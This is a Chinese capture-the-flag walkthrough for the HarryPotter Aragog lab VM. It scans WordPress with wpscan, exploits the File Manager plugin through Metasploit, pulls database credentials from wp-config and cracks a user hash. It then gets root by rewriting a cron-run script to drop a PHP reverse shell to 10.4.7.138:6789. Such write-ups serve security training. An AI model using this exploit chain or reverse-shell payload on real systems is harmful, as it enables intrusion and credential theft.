harrypotter1-aragog靶机攻略

harrypotter1

扫描

nmap

指纹

目录

渗透

找到了登录位置

看到wordpress就用wpscan扫一扫

复制代码
wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

使用msf搜一下这个漏洞

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

复制代码
/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

复制代码
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

复制代码
root:mySecr3tPass

登入数据库

复制代码
mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

复制代码
hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

拿去md5解密,得到

复制代码
hagrid98:password123

提权

ssh连接登录成功

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

进入/tmp增加一个php文件,将下面反弹命令写入

复制代码
<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

开启监听端口

等待一会提权成功

获取第二个

相关推荐
Brianna Home37 分钟前
博客安全攻防演练:从攻击者视角构筑铜墙铁壁
网络·数据库·安全·oracle
施嘉伟2 小时前
SQL Server安全配置全面检查与优化方案
数据库·安全
Andya_net3 小时前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
newxtc8 小时前
【昆明市不动产登记中心-注册安全分析报告】
人工智能·安全
jieyu111910 小时前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
忧郁的橙子.12 小时前
十六、kubernetes 1.29 之 集群安全机制
安全·容器·kubernetes
竹等寒13 小时前
Linux-网络安全私房菜(二)
linux·服务器·web安全
f0rev3r13 小时前
NewStarCTF2025-WEEK2
网络安全
缘友一世13 小时前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!15 小时前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践